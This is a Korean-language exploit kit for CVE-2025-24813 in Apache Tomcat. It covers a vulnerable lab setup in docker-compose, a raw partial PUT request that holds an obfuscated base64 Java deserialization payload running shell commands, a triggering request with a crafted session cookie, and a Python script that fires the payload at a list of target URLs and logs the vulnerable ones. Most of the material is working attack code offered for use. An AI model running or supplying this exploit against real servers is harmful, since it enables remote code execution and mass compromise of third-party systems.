
CVE-2025-24813 악용 도구
web.xml에서 readonly=false 구성 필요context.xml에서 PersistentManager 및 FileStore 구성 필요보안 취약점이 있는 버전 다운로드
https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/9.0.98/


<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<Manager className="org.apache.catalina.session.PersistentManager">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
version: '3.8'
services:
tomcat:
image: tomcat:9.0.8-jre8-slim
container_name: CVE-2025-24813 # 컨테이너 이름 지정
volumes:
# web.xml 마운트 및 교체
- ./web.xml:/usr/local/tomcat/conf/web.xml
# context.xml 마운트 및 교체
- ./context.xml:/usr/local/tomcat/conf/context.xml
# JAR 파일을 lib 디렉터리에 추가
#
- ./commons-collections-3.2.1.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.jar
ports:
- "8080:8080"
docker-compose up -d


PUT /pocss/session HTTP/1.1
Host: 192.168.223.132:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{base64dec(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)}}

GET / HTTP/1.1
Host: 192.168.223.132:8080
Cookie: JSESSIONID=.pocss


import base64
import requests
import sys
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def main():
# 파일 경로 파라미터 가져오기
url_file = sys.argv[1] if len(sys.argv) > 1 else 'url.txt'
payload_file = sys.argv[2] if len(sys.argv) > 2 else 'payload.ser'
# 대상 URL 목록 읽기
try:
with open(url_file, 'r') as f:
urls = [line.strip() for line in f if line.strip()]
# URL 형식 검증
valid_urls = []
for url in urls:
if not url.startswith(('http://', 'https://')):
print(f"경고: {url} 은(는) 유효한 URL이 아닙니다 (프로토콜 누락), 건너뜁니다")
continue
if not url.split('//')[1]:
print(f"경고: {url} 은(는) 유효한 URL이 아닙니다 (호스트명 누락), 건너뜁니다")
continue
valid_urls.append(url)
if not valid_urls:
print("테스트할 유효한 URL이 없습니다")
return
except FileNotFoundError:
print(f"[+] {url_file} 파일을 찾을 수 없습니다")
return
# payload.ser 읽기 및 디코딩
try:
with open(payload_file, 'rb') as f:
datas = f.read()
payload = base64.b64decode(datas) # base64 디코딩만 수행, UTF-8 디코딩은 하지 않음
except FileNotFoundError:
print("payload.ser 파일을 찾을 수 없습니다")
return
# PUT 요청 구성
headers = {
'Content-Length': '1000',
'Content-Range': 'bytes 0-1000/1200'
}
headers2 = {
'Cookie': 'JSESSIONID=.pocs'
}
# 프록시 구성
proxies = {
'http': 'http://127.0.0.1:8083',
'https': 'http://127.0.0.1:8083'
}
# HTTPS 인증서 오류 무시
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
verify_ssl = False
# 통계 정보
total = len(valid_urls)
vulnerable = 0
vulnerable_urls = []
for i, url in enumerate(valid_urls):
try:
# PUT 요청 전송
response = requests.put(f"{url}/pocs/session", headers=headers, data=payload, timeout=3, proxies=proxies, verify=verify_ssl)
if response.status_code != 409:
continue
# GET 요청 전송
response = requests.get(url, headers=headers2, proxies=proxies, verify=verify_ssl)
if response.status_code == 500:
vulnerable_urls.append(url)
vulnerable += 1
except requests.exceptions.RequestException:
continue
print("\n" + "="*50)
print(f"[+] 스캔 완료!")
print(f"[+] 총 대상: \033[1;33m{total}\033[0m")
print(f"[+] 취약한 대상: \033[1;31m{vulnerable}\033[0m")
print(f"[+] 안전한 대상: \033[1;32m{total - vulnerable}\033[0m")
if vulnerable > 0:
print("\n[+] 취약한 URL 목록:")
for vuln_url in vulnerable_urls:
print(f" - {vuln_url}")
# 취약한 URL을 파일로 저장
with open('vulnerable_urls.txt', 'w') as f:
for vuln_url in vulnerable_urls:
f.write(vuln_url + '\n')
print(f"[+] 취약한 URL이 vulnerable_urls.txt 에 저장되었습니다")
print("="*50)
if __name__ == "__main__":
main()
스크립트 사용
python CVE_2025_24813.py
